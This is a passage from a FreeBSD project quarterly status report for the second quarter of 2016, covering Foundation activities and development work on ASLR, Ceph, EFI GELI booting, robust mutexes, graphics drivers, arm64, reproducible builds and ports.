The Design and Implementation of the 4.3BSD UNIX Operating System. __________________________________________________________________ The FreeBSD Foundation Links FreeBSD Foundation Website URL: https://www.freebsdfoundation.org/ Contact: Deb Goodkin The FreeBSD Foundation is a 501(c)(3) non-profit organization dedicated to supporting and promoting the FreeBSD Project and community worldwide. Funding comes from individual and corporate donations and is used to fund and manage development projects, conferences and developer summits, and provide travel grants to FreeBSD developers. The Foundation purchases hardware to improve and maintain FreeBSD infrastructure and publishes FreeBSD white papers and marketing material to promote, educate, and advocate for the FreeBSD Project. The Foundation also represents the FreeBSD Project in executing contracts, license agreements, and other legal arrangements that require a recognized legal entity. Here are some highlights of what we did to help FreeBSD last quarter: Fundraising Efforts Our work is 100% funded by your donations. Our spending budget for 2016 is $1,250,000 and we've raised $265,000 so far. Our Q1-Q2 financial reports will be posted by August 1. As you can see, we need your donations to continue supporting FreeBSD at our current level. Please consider making a donation here: freebsdfoundation.org/donate. OS Improvements The Foundation improves FreeBSD by funding software development projects approved through our proposal submission process, and our internal software developer staff members. Two Foundation-funded projects continued last quarter; one project is to improve the stability of the vnet network stack virtualization infrastructure, and the second is phase two of the FreeBSD/arm64 port project. Foundation staff members were responsible for many changes over the quarter. Kostik Belousov accomplished the following work last quarter: implemented robust mutexes support, as part of ongoing efforts to bring our threading library into POSIX compliance and feature completeness; documented kernel interfaces used by the threading library and produced almost 30 pages of technical text; completed and committed the elimination of the pvh_global_lock from the amd64 pmap, which removed a hot contested lock; and fixed bugs that help keep FreeBSD stable and reliable. Edward Napierala accomplished the following work last quarter: added filesystem thoughput limits to RCTL; committed iSER initiator support; added support for rerooting into NFS; and added iscsictl -e, which makes it possible to enable and disable iSCSI sessions. Ed Maste, our Project Development Director, accomplished the following work last quarter: investigated the state of reproducible builds in the ports tree, with some work in progress to address issues; updated the ELF Tool Chain tools with bug fixes and improved handling of malformed input; investigated using lld, the linker from the LLVM family, to link the FreeBSD base system; and reported on and tested patches for issues found. He also managed the arm64 development project and investigated and fixed a number of bugs. Lastly, he imported LLVM's libunwind and prepared it for use in FreeBSD 11, and investigated and reviewed the blacklistd proposal and patches. George Neville-Neil continued hosting the bi-weekly Transport conference call (notes at https://wiki.FreeBSD.org/TransportProtocols) and the bi-weekly DTrace conference call (notes at https://wiki.FreeBSD.org/DTrace. Ed continued facilitating the bi-weekly graphics call to coordinate efforts on the i915 driver and other graphics stack work. Several of these projects are described elsewhere in this quarterly report. Release Engineering Foundation employee and release engineer Glen Barber worked closely with Marius Strobl on the 10.3-RELEASE, which was completed in April. Glen also merged the release-pkg branch to 11-CURRENT, though this will be a beta feature for 11.0-RELEASE. Lastly, with the Release Engineering Team, he started the 11.0-RELEASE cycle. Find out more in the Release Engineering Team status entry in this report. "Getting Started with FreeBSD" Project We hired a summer intern, with no FreeBSD, Linux, or any command line operating system experience, to figure out on his own how to install and use FreeBSD. He is writing easy-to-follow how-to guides to help make the new user experience straightforward and positive. He's also been submitting bug reports and problems through the appropriate channels. You can check out his first how-to guide at https://www.freebsdfoundation.org/freebsd/how-to-guides/. FreeBSD Advocacy and Education A large part of our efforts are dedicated to advocating for the Project. This includes promoting work being done by others with FreeBSD; producing advocacy literature to teach people about FreeBSD and help make the path to starting using FreeBSD or contributing to the Project easier; and attending and getting other FreeBSD contributors to volunteer to run FreeBSD events, staff FreeBSD tables, and give FreeBSD presentations. Some of the work we did last quarter to support FreeBSD advocacy included: Creating a FreeBSD page on our website to promote FreeBSD derivative projects and showcase FreeBSD users (https://www.freebsdfoundation.org/freebsd/), and promoting FreeBSD research by creating a Research page on our site and conference handout (https://www.freebsdfoundation.org/what-we-do/research/). We created guidelines and a repository for using the Project and Foundation logos (https://www.freebsdfoundation.org/about/brand-assets/). To help showcase FreeBSD contributors, we published two new Faces of FreeBSD stories, about Michael Lucas (https://www.freebsdfoundation.org/blog/faces-of-freebsd-2016-michael-lu= cas/) and Kris Moore https://www.freebsdfoundation.org/blog/faces-of-freebsd-2016-kris-moore/= ). We published the March/April and May/June issues of the FreeBSD Journal and participated in editorial board work. Kirk McKusick wrote a feature article on the Fast Filesystem for the March/April issue, and other team members helped review and edit Journal articles. We also published monthly newsletters to highlight work being done to support FreeBSD, tell you about upcoming events, and provide other information to keep you in the loop on what we're doing to support the FreeBSD Project and community. George Neville-Neil and Robert Watson continued teaching and developing open source FreeBSD teaching materials at teachbsd.org. We launched the first Hosting Partner Spotlight to showcase the Project's partnership with NYI (https://www.freebsdfoundation.org/blog/hosting-partner-spotlight-nyi-at= -the-heart-of-freebsd/) We worked with Microsoft to get FreeBSD onto Azure (https://www.freebsdfoundation.org/blog/more-from-the-freebsd-foundation= -on-the-projects-partnership-with-microsoft/). The Foundation was quoted in Cavium's Thunder X2 press release (http://www.prnewswire.com/news-releases/cavium-announces-thunderx2-3002= 76536.html George worked with ARM to coordinate the upcoming ARM Partner Meeting in Cambridge. Conferences and Events The FreeBSD Foundation sponsors many conferences, events, and summits around the globe. These events can be BSD-related, open source, or technology events geared towards underrepresented groups. We support the FreeBSD-focused events to help provide a venue for sharing knowledge, to work together on projects, and to facilitate collaboration between developers and commercial users. This all helps provide a healthy ecosystem. We support the non-FreeBSD events to promote and raise awareness about FreeBSD, to increase the use of FreeBSD in different applications, and to recruit more contributors to the Project. In April, Benedict Reuschling helped organize and run a hackathon in Essen April 22-24. He then attended the Open Source Datacenter conference in Berlin, with Allan Jude, to give a talk about "Interesting things you can do with ZFS," which highlighted OpenZFS features and how well they work on FreeBSD (https://www.netways.de/index.php?id=3D3445#c44065). We promoted FreeBSD at: * Flourish -- April 1-2 in Chicago (http://flourishconf.com/2016/) * LFNW -- April 23-24 in Bellingham WA (https://www.linuxfestnorthwest.org/2016). * OSCON -- May 18-19 in Austin, TX (http://conferences.oreilly.com/oscon/open-source-us Deb Goodkin and Dru Lavigne attended the Community Leadership Summit in Austin: May 14, 15 (http://www.communityleadershipsummit.com/schedule/) Deb promoted FreeBSD at USENIX ATC June 22-23 in Denver, CO. Our team attended BSDCan and the Ottawa Developer Summit. We held our annual board meeting to vote on officers, board members, and work on our strategic planning. Most of us attended the developer/vendor summits. Kirk McKusick presented "A Brief History of the BSD Fast Filesystem" (http://www.bsdcan.org/2016/schedule/events/654.en.html). Ed Maste gave a presentation on "Reproducible Builds in FreeBSD". George helped run the vendor summit. We sponsored five FreeBSD contributors to attend BSDCan. Legal/FreeBSD IP The Foundation owns the FreeBSD trademarks, and it is our responsibility to protect them. We continued to review requests and grant permission to use the trademarks. FreeBSD Community Engagement We launched our first Community Survey. The purpose was to get input from the community on why they use FreeBSD, what they'd like to see the Foundation support, and other input to help us determine our direction and how we should support the Project. Anne Dickison, our Marketing Director, has been overseeing the efforts to rewrite the Project's Code of Conduct to help make this a safe, inclusive, and welcoming community. Other Stuff We Did Last quarter we purchased a server to reside at NYI to improve the continuous integration tools within the Project. We had two face-to-face board meetings last quarter to work on strategic planning and identify areas in the project we should support. We also held our first ever staff retreat in Boulder, Colorado to give our small team an opportunity to work together in person. We hired Sabine Percarpio as our Administration Manager. She is helping us manage donations, accounting, travel grant applications, handle questions that come in to the Foundation, and run our organization smoothly. __________________________________________________________________ Projects ASLR Interim State Links Patch Home URL: http://kib.kiev.ua/kib/aslr Contact: Konstantin Belousov This is an interim report on the technical state of my work towards ASLR support in the FreeBSD base system. The proccontrol(1) utility was written to manage and query ASLR enforcement on a per-process basis. It is required for analyzing ASLR failures in specific programs. This utility leverages the procctl(2) interface which was added to the previous version of the patch, with some bug fixes. With r300792, ASLR settings are reset to system-wide defaults whenever a setuid binary is executed. The command's syntax is: proccontrol -m (trace|aslr) [-q] [-s (enable|disable)] [-p pid | command] with possible arguments -m (specifies the trace mode to control debugger attachments) -q (queries the state of the specified mode for the process with the PID specified by the -p option) -s (toggles the feature on or off for the given process or itself) If a command is specified, it inherits the applied settings from proccontrol. For instance, to start a build of a program with ASLR disabled, use proccontrol -m aslr -s disable make. A ports exp-run was done with ASLR tuned up to the most aggressive settings. The results can be found in PR 208580. Case study: Lisp SBCL is an interesting case which illustrates several points. It is much smaller than JDK, and its build system is easier to work with. The code provides a very non C-like language runtime which utilizes a lot of corner cases and makes non-standard uses of the VM system, at least from the point of view of a typical C programmer. SBCL compiles Lisp forms into the machine native code and manages its own arena for objects. The precompiled Lisp runtime is mapped from a core file. SBCL relies on the operating system's C runtime for the initial load of Lisp, and needs a functional libc to issue many system calls, including syscalls, as well as the dynamic loader. The end result is that there are unfixed mmap(2) calls during both startup and runtime, interfering with other MAP_FIXED mmaps. The loading of the core file and the private arenas are hard-coded to exist at fixed addresses. This happens to work on the default address map, which is not changed often, so the SBCL choices of the base addresses evolved to work. But any significant distortion of the standard map results in SBCL mmap(MAP_FIXED) requests attempting to override memory from other allocators. FreeBSD uses the MAP_EXCL flag to mmap(2), which must be used in the form MAP_FIXED|MAP_EXCL to cause mmap(2) to fail if the requested range is already used. I tried to force MAP_FIXED requests from SBCL to implicitly set MAP_EXCL, but this did not go well, since SBCL sometimes pre-allocates regions for later use with MAP_FIXED. So, MAP_EXCL mappings failed, dumping the process into ldb. On Linux, if it is detected that the kernel is in AS-randomization mode, the initial SBCL runtime sets its personality to non-random and re-execs. This might be a solution for FreeBSD as well, after the ASLR patch is committed, so that the procctl(2) knob is officially available. SBCL still has issues on Linux, even with re-exec, when more aggressive randomization from the PaX patch is applied, as seen in bug 1523213. Case study: Emacs The Emacs build procedure involves loading the temacs image with the compiled Emacs Lisp files and then dumping its memory to create an image with the content preloaded, in order to reduce startup time. Recent Emacs sources seem to generally avoid MAP_FIXED, except in some situations. When Emacs does use the flag, it carefully checks that the selected region is not busy. In fact, Emacs would benefit from using MAP_EXCL. I tried several runs of building Emacs and running the dumped binary, but was not able to reproduce any issues. It seems that the code improved enough to tolerate ASLR both in Linux and NetBSD without turning it off. In my opinion, it is not reasonable to fight the issues in the kernel as most of it is not fixable from the kernel side. The procctl(2) interface and proccontrol(1) utilities provide an override when needed, but are not automated. Conclusions The set of ports which cannot be built with ASLR turned on should be limited but fluid. However, exp-runs may not reliably uncover all problems due to randomization, as seen in the Emacs example. In the route to enable ASLR by default (with non-aggressive settings), the ports framework should provide an option like ASLR_UNSAFE=3Dyes which spawns proccontrol -m aslr -s disable make for the build stages of the unsafe port. Users would still need to be aware of proccontrol(1) in order to run the resulting binary or wrapper scripts provided to do so. A recommended approach is a flag in the ELF binary to mark it as not compatible with non-standard AS layouts. This frees users from having to use proccontrol(1), but still requires patching the application's build process and upstreaming the changes. This approach is also useful outside the context of ASLR. However, that mechanism is not yet ready, and developing it is a larger work than ASLR itself. This project was sponsored by The FreeBSD Foundation. __________________________________________________________________ Ceph on FreeBSD Links Ceph Main Site URL: http://ceph.com Main Repository URL: https://github.com/ceph/ceph My Fork URL: https://github.com/wjwithagen/ceph Pull Request With FreeBSD-Specific Changes to Ceph URL: https://github.com/ceph/ceph/pull/7573 Contact: Willem Jan Withagen Ceph is a distributed object store and filesystem designed to provide excellent performance, reliability, and scalability. It provides the following features: 1. Object Storage: Ceph provides seamless access to objects using native language bindings or radosgw, a REST interface that is compatible with applications written for S3 and Swift. 2. Block Storage: Ceph's RADOS Block Device (RBD) provides access to block device images that are striped and replicated across the entire storage cluster. 3. File System: Ceph provides a POSIX-compliant network filesystem that aims for high performance, large data storage, and maximum compatibility with legacy applications. I started looking into Ceph because using HAST with CARP and ggate did not meet my requirements. My primary goal with Ceph is to run a storage cluster of ZFS storage nodes where the clients run bhyve on RBD disks stored in Ceph. The FreeBSD build process can build most of the tools in Ceph. However, the RBD-dependent items do not work, since FreeBSD does not yet provide RBD support. Since the last quarterly report, the following progress was made: 1. Switching to using CMake from Automake results in a much cleaner development environment and better test output. The changes can be found in the wip-wjw-freebsd-cmake branch. 2. The throttling code has been overhauled to prevent live locks. These mainly occur on FreeBSD but also manifest on Linux. 3. A few more tests were fixed. On one occasion, I was able to complete the full test suite without errors. 11-CURRENT is used to compile and build-test Ceph. The Clang toolset needs to be at least version 3.7, as the Clang 3.4 available on stable/10 does not have all of the capabilities required to compile everything. This setup will get things running for FreeBSD: * Install bash and link to it in /bin (requires root privileges): sudo pkg install bash sudo ln -s /usr/local/bin/bash /bin/bash * Build Ceph: git clone https://github.com/wjwithagen/ceph.git cd ceph git checkout wip-wjw-freebsd-tests ./do_freebsd-cmake.sh --deps The --deps argument is only needed for the initial installation, to pull in the necessary dependencies; it should be omitted for subsequent builds. CMake is now used to build Ceph on FreeBSD; the old method using automake is no longer used. Parts Not Yet Included: * RBD: Rados Block Devices are currently implemented in the Linux kernel, but there used to be a userspace implementation. It is possible that ggated could be used as a template, since it provides some of the same functionality and it has a userspace counterpart. * BlueStore: FreeBSD and Linux have a different AIO API which needs to be bridged. There has been some discussion about aio_cancel not working for all device types in FreeBSD. * CephFS: Cython tries to access an internal field in struct dirent, which fails to compile. * Tests that verify the correct functionality of these features are also excluded from the test suite. Tests Not Yet Included: * ceph-detect-init/run-tox.sh: the current implementation does not know anything about FreeBSD's rc system. * Tests that make use of nosetests do not really work since nosetests is not in /usr/bin, and calling /usr/bin/env nosetests does not work on FreeBSD. * test/pybind/test_ceph_argparse.py * test/pybind/test_ceph_daemon.py Open tasks: 1. The current and foremost task is to get the test suite to complete without errors. 2. Build an automated test platform that will build ceph/master on FreeBSD and report the results back to the Ceph developers. This will increase the maintainability of the FreeBSD side of things, as developers are signaled that they are using Linux-isms that will not compile or run on FreeBSD. Ceph has several projects that support this: Jenkins, teuthology, and palpito. But even a while { compile } loop that reports the build data on a static webpage is a good start. 3. Run integration tests to see if the FreeBSD daemons will work with a Linux Ceph platform. 4. Get the currently excluded Python tests to work. 5. Compile and test the userspace RBD (Rados Block Device). 6. Investigate if an in-kernel RBD device could be developed akin to ggate. 7. Investigate the keystore which currently prevents the building of Cephfs and some other parts. 8. Integrate the FreeBSD /etc/rc.d init scripts in the Ceph stack for testing and for running Ceph on production machines. __________________________________________________________________ EFI Refactoring and GELI Support Links GELI Support Branch URL: https://github.com/emc2/freebsd/tree/geli_efi EFI Refactoring Branch URL: https://github.com/emc2/freebsd/tree/efize Contact: Eric McCorkle The EFI bootloader has undergone considerable refactoring to make more use of the EFI API. The filesystem code in boot1 has been eliminated, and a single codebase for filesystems now serves both boot1 and loader. This codebase is organized around the EFI driver model and it should be possible to export any filesystem implementation as a standalone EFI driver without too much effort. Both boot1 and loader have been refactored to utilize the EFI_SIMPLE_FILE_SYSTEM interface. In the loader, this is accomplished with a dummy filesystem driver that is just a translation layer between the loader filesystem interface and EFI_SIMPLE_FILE_SYSTEM. A reverse translation layer allows the existing filesystem drivers to function as EFI drivers. The EFI refactoring by itself exists in a branch on github. Additionally, GELI support has been added using the EFI refactoring. This allows booting from a GELI-encrypted filesystem. Note that the EFI system partition, which contains boot1, must be a plaintext msdosfs partition. This patch adds an intake buffer to the crypto framework, which allows injection of keys directly into a loaded kernel, without the need to pass them through arguments or environment variables. This patch only uses the intake buffer for EFI GELI support, as legacy BIOS GELI support still uses environment variables. EFI GELI support depends on the efize branch. These patches have been tested and used and should be able to handle use by early adopters. Note that the LOADER_PATH variable has been changed to /boot/loader.tst, to facilitate safe testing. IMPORTANT: As this is an encrypted filesystem patch, an error can potentially leave data inaccessible. It is strongly recommended to use the following procedure for testing: 1. Back up your data! 2. Do not forget to back up your data! 3. Install an EFI shell on the EFI System Partition (ESP). 4. Install the patched boot1 on the ESP to something like /boot/efi/BOOTX64.TST. 5. Install the patched loader to /boot/loader.tst on your machine. 6. Create a GELI partition outside of the normal boot partition. 7. First, try booting /boot/efi/BOOTX64.TST and make sure it properly handles the encrypted partition. 8. Copy a boot environment, including the patched loader, to the encrypted partition. 9. Use the loader prompt to load a kernel from the encrypted partition. 10. Try switching over to an encrypted main partition once everything else is working. Open tasks: 1. Testing is needed. 2. The code will need review, and some style(9) normalization must occur before it goes into FreeBSD. __________________________________________________________________ Robust Mutexes Contact: Konstantin Belousov Contact: Ed Maste Now that process-shared locks are implemented for our POSIX threads implementation, libthr, the only major feature lacking for POSIX compliance is robust mutexes. Robust mutexes allow applications to detect, and theoretically recover from, crashes which occur while modifying the shared state. The supported model is to protect shared state by a pthread_mutex, and the crash is detected as thread termination while owning the mutex. A thread might terminate alone, or it could be killed due to the termination of the containing process. As such, the robust attribute is applicable to both process-private and -shared mutexes. An application must be specifically modified to handle and recover from failures. The pthread_mutex_lock() function may return a new error EOWNERDEAD, which indicates that the previous owner of the lock terminated while still owning the lock. Despite returning this non-zero value, the lock is granted to the caller. In the simplest form, an application may detect the error and refuse to operate until the persistent shared data is recovered, such as by manual reinitialization. More sophisticated applications could try to automatically recover from the condition, in which case pthread_mutex_consistent(3) must be called on the lock before unlocking it. However, such recovery can be considered to be very hard. Still, even the detection of inconsistent shared state is useful, since it avoids further corruption and random faults of the affected application. It is curious but not unexpected that this interface is not used widely. The only real-life application which utilizes it is Samba. Using Samba with an updated FreeBSD base uncovered minor bugs both in the FreeBSD robust mutex implementation, and in Samba itself. It is believed that libthr in FreeBSD 11 is POSIX-compliant for major features. Further work is planned to look at inlining the lock structures to remove overhead and improve the performance of the library. Most of the implementation of the robustness feature consisted of making small changes in the lock and unlock paths, both in libthr and in kern_umtx.c. This literally required reading all of the code dealing with mutexes and condition variables, which was something I wanted to help future developers with. In the end, with the help of Ed Maste, man pages for umtx(2) and all thr*(2) syscalls were written and added to the base system's documentation set. This project was sponsored by The FreeBSD Foundation. Open tasks: 1. Use the implementation in real-word applications and report issues. __________________________________________________________________ The Graphics Stack on FreeBSD Links GitHub Repository URL: https://github.com/FreeBSDDesktop/freebsd-base-graphics Graphics Stack Roadmap and Supported Hardware Matrix URL: http://wiki.FreeBSD.org/Graphics Ports Development Repository URL: https://github.com/FreeBSD/freebsd-ports-graphics DRM 4.6 Development Repository URL: https://github.com/FreeBSDDesktop/freebsd-base-graphics/tree/drm-n= ext-4.6 GSoC 2016: Link /dev Entries to Sysctl Nodes URL: https://wiki.FreeBSD.org/SummerOfCodeIdeas#Devices_management:_lin= k_.2Fdev_entries_to_sysctl_nodes GSoC 2016: Redesign libdevq URL: https://wiki.FreeBSD.org/SummerOfCode2016/RethinkLibdevq Graphics Team Blog URL: http://planet.FreeBSD.org/graphics Contact: FreeBSD Graphics team Contact: Matthew Macy In the Ports tree, Mesa was updated to 11.2.2. The next major release, 12.0.0 release candidate 4, is ready for testing in our development tree. The GSoC project about being able to connect a /dev entry to sysctl nodes is making progress. After some fruitful discussons on the freebsd-arch@ mailing-list, Kiloreux finished the design and is now implementing the solution. The GSoC project on libdevq was abandoned. All Intel GPUs up to and including the unreleased Kaby Lake are supported. The xf86-video-intel driver will be updated soon. Updating this driver requires updating Xorg, which in turn is blocked on Nvidia updates. Several problems remain to be solved: * There are instances of visual artifacts that appear with varying frequency, depending on workload. Of particular note is the lack of redraw when a Qt5 window is partially covered by a menu and then uncovered. * WebGL demos will sometimes fail due to a recoverable render ring hang. * There are still some known stability issues with processors prior to Sandy Bridge (pre-2010). Matt Macy is hoping to be able to diagnose the first two issues, along with others, by updating Linux support to the point where the Intel GPU Tools work on FreeBSD. The Radeon AMD/ATI driver has been updated to GCN 1.0. This has only been tested on an R7 240. 2D-accelerated X works. Due to apparent issues with user library support, X does not recognize the KMS driver as being 3D-capable and reports it as "not DRI2 capable". The OpenCL benchmark clpeak fails in drm/ttm, so there may in fact be issues in the underlying 3D support. The Amdgpu AMD/ATI driver has been updated to GCN 1.1 and higher. The KMS driver loads and attaches on discrete GPUs, though problems still exist on the Carizzo APU. X will not start due to unimplemented functions in libdrm. Koop Mast is actively working on this and should have it fixed soon. None of the required patches to src/sys were committed in time for FreeBSD 11. Although the plan is to ultimately make linuxkpi, drm, i915, radeon, and amdgpu updates available as ports, this will likely not happen until development has slowed to the point where it is economical to backport them to FreeBSD in svn. Until that time, modern GPU support will be available in PC-BSD snapshots and in the drm-next-4.6 branch on GitHub. __________________________________________________________________ Kernel ARM Allwinner SoC Support Links Allwinner FreeBSD Wiki URL: https://wiki.FreeBSD.org/FreeBSD/arm/Allwinner Contact: Jared McNeill Contact: Emmanuel Vadot Allwinner SoCs are used in multiple hobbyist devboards and single-board computers. Recently, support for these SoCs received many updates. Theses tasks were completed during the second quarter of 2016: * Switch to upstream DTS * A83T SoC support * H3 SoC support * Switch to the new clock framework * Convert the A10 interrupt controller to INTRNG * OHCI support * A generic ALLWINNER kernel config file * A20/A31 NMI support * AXP209 PMU interrupts, GPIO, and sensors support * A83T thermal sensor support * RSB (Reduced Serial Bus) support * AXP813/AXP818 PMU support * A83T Security ID support * Support for the Allwinner Gigabit Ethernet controller found in H3/A83T/A64 * USB OTG (in review) * A10/A20 Security ID support (in review) * A13 SoC Support (in review) Ongoing work: * A64 support * Use U-Boot EFI implementation for ARM32/ARM64 Open tasks: 1. SPI driver 2. LCD Support 3. Any unsupported hardware device that might be of interest. __________________________________________________________________ FreeBSD on Hyper-V and Azure Links FreeBSD Virtual Machines on Microsoft Hyper-V URL: https://wiki.FreeBSD.org/HyperV Supported Linux and FreeBSD virtual machines for Hyper-V on Windows URL: https://technet.microsoft.com/en-us/library/dn531030.aspx Contact: Sepherosa Ziehau Contact: Hongjiang Zhang Contact: Dexuan Cui Contact: Kylie Liang During BSDCan 2016, Microsoft announced the global availability of FreeBSD 10.3 images in Azure. There are many FreeBSD-based Azure virtual appliances in the Azure Marketplace, including Citrix Systems' NetScaler and Netgate's pfSense. Microsoft also made an in-depth technical presentation to introduce how the performance of the Hyper-V network device driver was optimized to reach full line rate on 10Gb networks and achieved decent performance on 40Gb networks. The slides and video from the presentation are available from the BSDCan website. Microsoft continues to strive to further optimize the performance of Hyper-V network and storage device drivers. Work is ongoing to replace the internal data structure in the LRO kernel API from a singly-linked list to a double-linked list, to speed up the LRO lookup by hash table, and to evaluate the performance with tcp_lro_queue_mbuf(). The handling of SCSI inquiry in the Hyper-V storage driver is enhanced to make sure that disk hotplug and smartctl(8) work reliably. Refer to PR 210425 and PR 209443 for details. BIS test cases are available on GitHub for Hyper-V and for Azure. This project was sponsored by Microsoft. __________________________________________________________________ VIMAGE Virtualized Network Stack Update Links Project Workspace (Now Merged to Head). URL: https://svnweb.FreeBSD.org/base/projects/vnet/ Contact: Bjoern A. Zeeb VIMAGE is a virtualization framework on top of FreeBSD jails that was introduced to the kernel about eight years ago with the vnet virtualized network stack. Over the last few years, many people started to use VIMAGE in production, production-like setups, and appliances. This adoption increased the urgency to finish the work to avoid panics on network stack teardown and to avoid memory leaks. The vnet teardown has been changed to be from top to bottom, trying to tear down layer by layer. This is preferable to removing interfaces first and then cleaning everything up, as no more packets could flow once the interfaces are gone. Along with this work, various paths with potential memory leaks were plugged. Lastly, vnet support was added to formerly unvirtualized components, such as the pf and ipfilter firewalls and some virtual interfaces. This project was sponsored by The FreeBSD Foundation. Open tasks: 1. Please test FreeBSD 11.0-ALPHA6 or later. When reporting a problem, use the vimage keyword in the FreeBSD bug tracker. __________________________________________________________________ Architectures FreeBSD/arm64 Links FreeBSD/arm64 Wiki Entry URL: https://wiki.FreeBSD.org/arm64 Contact: Andrew Turner The arm64 pmap code has been updated to work with the full 4 pagetable levels. This allows us to increase the user virtual address space to 256TB, with a concomittant increase of the kernel virtual address space. It also allows an increase in the size of the physical memory FreeBSD can handle to up to 2TB. The interrupt framework has been replaced with intrng on arm64. This allows both arm and arm64 to share interrupt controller drivers, as is the case with the GICv2 driver. The GICv3 ITS driver has been rewritten to better integrate with intrng. Busdma was updated to handle the cache. The updated code assumes that devices are non-coherent by default, unless the device driver marks the DMA tag as coherent when creating it. The generic and ThunderX PCIe drivers have been updated to create coherent mappings when the device tree marks the hardware as coherent. This work also fixed issues found with the sync operation where it was missing memory barriers. A number of issues with hwpmc have been fixed. This improves the stability of hwpmc on arm64, with no known software issues. There is a single known issue which seems to be hardware-related, however, further testing is required. NEW_PCIB has been enabled on arm64. This includes handling the PCI_RES_BUS resource type. Old interfaces replaced before FreeBSD-11 have been removed from the arm64 kernel and libraries. This includes support for compatibility with libc from releases prior to 11.0. The brk and sbrk functions have also been removed. This allows a workaround for these functions in the arm64 C runtime to be removed. loader.efi has been updated to use an event timer to implement its internal time function. This is needed, as many UEFI implementations do not handle the GetTime runtime service method. This means that loader.efi will now correctly count down before automatically booting. Initial support for the ARM Juno reference platform has been added. This hardware is common within ARM, and has been useful for finding assumptions on cpuids. Booting on the Juno required fixing the kernel to remove the assumption that it is booting from CPU zero. This included assigning cpuids and fixing assumptions within the GICv2 driver that the cpuid is the same as the GIC cpuid. FreeBSD can now boot on the 4 Cortex-A53 CPUs of the Juno board. Further investigation is needed to track down why the boot fails when the 2 Cortex-A57 CPUs are enabled. Initial work has started on booting FreeBSD on the Pine64 and Raspberry Pi 3 boards. Both can boot to multiuser mode with out-of-tree patches. Further work is needed to bring these patches into the tree, but it is expected this will happen soon after the end of the code freeze. This project was sponsored by The FreeBSD Foundation, and ABT Systems Ltd. __________________________________________________________________ Userland Programs Reproducible Builds in FreeBSD Links Base System Reproducible Builds Wiki Page URL: https://wiki.FreeBSD.org/ReproducibleBuilds Ports Reproducible Builds Wiki Page URL: https://wiki.FreeBSD.org/PortsReproducibleBuilds BSDCan 2016 Reproducible Builds in FreeBSD talk URL: http://www.bsdcan.org/2016/schedule/events/714.en.html Reproducible Builds Website URL: https://reproducible-builds.org/ Diffoscope Home Page URL: https://diffoscope.org/ Diffoscope Results from the BSDCan Reproducible Builds Talk URL: https://people.FreeBSD.org/~emaste/reproducible-builds/iteration-1= /diffoscope/ Contact: Ed Maste Reproducible builds are a set of software development practices which create a verifiable path from human-readable source code to the binary code used by computers. In brief, the idea is that building the same binary, software package, document, or other binary artifact twice from the same source produces identical output. The reproducible-builds.org website provides background information and documentation on making builds reproducible. Many folks have contributed to the reproducible build effort in FreeBSD src and ports over the last decade. There are many practical benefits of reproducible builds, such as bandwidth and storage savings. However, there is a growing interest in the broad open source and free software communities, primarily from a software and toolchain integrity perspective. Over the last few years, some members of the Debian Project have led a comprehensive and structured reproducible builds effort. Baptiste Daroussin and Ed Maste attended the first Reproducible Builds Summit in Athens last year. Since then, Ed investigated the state of build reproducibility in the ports tree, and presented Reproducible Builds in FreeBSD at BSDCan 2016. With some work-in-progress patches, over 80% of the FreeBSD ports tree builds reproducibly. The Diffoscope tool performs in-depth comparison of files, archives, or directories to understand why a binary artifact does not build reproducibly. Diffoscope results for the nonreproducible builds in Ed's talk are available at one of the links above. This project was sponsored by The FreeBSD Foundation. Open tasks: 1. Integrate FreeBSD ports builds into the reproducible-builds.org continuous integration infrastructure. 2. Integrate reproducible build patches into the ports tree. 3. Investigate sources of nonreproducibility in individual ports. __________________________________________________________________ Updates to GDB Contact: John Baldwin Contact: Luca Pizzamiglio The devel/gdb port has been updated to GDB 7.11.1. Support for system call catchpoints has been committed upstream. Support for examining ELF auxiliary vector data via info auxv has been committed upstream. Both features will be included in GDB 7.12. Open tasks: 1. Figure out why the powerpc kgdb targets are not able to unwind the stack past the initial frame. 2. Add support for more platforms, such as arm, mips, and aarch64, to upstream gdb for both userland and kgdb. 3. Add support for debugging powerpc vector registers. 4. Add support for $_siginfo. 5. Implement info proc commands. 6. Implement info os commands. __________________________________________________________________ Using lld, the LLVM Linker, to Link FreeBSD Links FreeBSD lld Wiki Page URL: https://wiki.FreeBSD.org/LLD Status Report on Linking FreeBSD/amd64 With lld URL: http://lists.llvm.org/pipermail/llvm-dev/2016-March/096449.html BSDCan 2016 Talk on lld for FreeBSD URL: http://www.bsdcan.org/2016/schedule/events/656.en.html Contact: Rafael Esp=EDndola Contact: Davide Italiano Contact: Ed Maste lld is the linker in the LLVM family of projects. It is intended to be a high-performance linker and supports the ELF, COFF, and Mach-O object formats. Where possible, lld maintains command-line and functional compatibility with the existing GNU BFD ld and gold linkers. However, the authors of lld are not constrained by strict compatibility where it would hamper performance or desired functionality. Over the last quarter, the lld project implemented version script support sufficient to handle the FreeBSD base system. This is an important milestone on the path to having lld as a viable system linker. lld still lacks comprehensive linker script expression evaluation support, and therefore cannot yet be used to link the FreeBSD kernel. This project was sponsored by The FreeBSD Foundation. Open tasks: 1. Develop linker script expression improvements in the upstream lld project. 2. Import a newer lld snapshot into the vendor area, add the build infrastructure, and connect it to the world build, installed as ld.lld. 3. Request a ports exp-run with /usr/bin/ld a symlink to ld.lld. 4. Extensive testing. __________________________________________________________________ Ports Bringing GitLab into the Ports Collection Links GitLab Port URL: http://freshports.org/www/gitlab PR: Not Starting on Boot URL: https://bugs.FreeBSD.org/bugzilla/show_bug.cgi?id=3D208793 Contact: Torsten Z=FChlsdorff After being in the FreeBSD Ports Collection for three months, GitLab continues to mature and gain adoption. Most of its initial problems have been resolved, with one known issue left: it does not start on boot. Any help in solving this issue is welcome. Staying in sync with upstream is now easy for minor versions. But, some of the monthly major releases create a big workload by introducing a number of new dependencies. This makes testing and updating an expensive process. The GitLab project itself now mentions native support on FreeBSD, which is quite a commendation. Current work aims to fix the open problems, get the latest major version into the port, and create documentation for the update progress. __________________________________________________________________ GNOME on FreeBSD Links FreeBSD GNOME Website URL: http://www.FreeBSD.org/gnome Development Repository URL: https://github.com/FreeBSD/freebsd-ports-gnome Upstream Build Bot URL: https://wiki.gnome.org/Projects/Jhbuild/FreeBSD USE_GNOME Porter's Handbook Chapter URL: https://www.FreeBSD.org/doc/en_US.ISO8859-1/books/porters-handbook= /using-gnome.html GNOME/Gtk+ 3.20 Update Bug URL: https://bugs.FreeBSD.org/bugzilla/show_bug.cgi?id=3D210272 Contact: FreeBSD GNOME Team The FreeBSD GNOME Team maintains the GNOME, MATE, and CINNAMON desktop environments and graphical user interfaces for FreeBSD. GNOME 3 is part of the GNU Project. MATE is a fork of the GNOME 2 desktop. CINNAMON is a desktop environment using GNOME 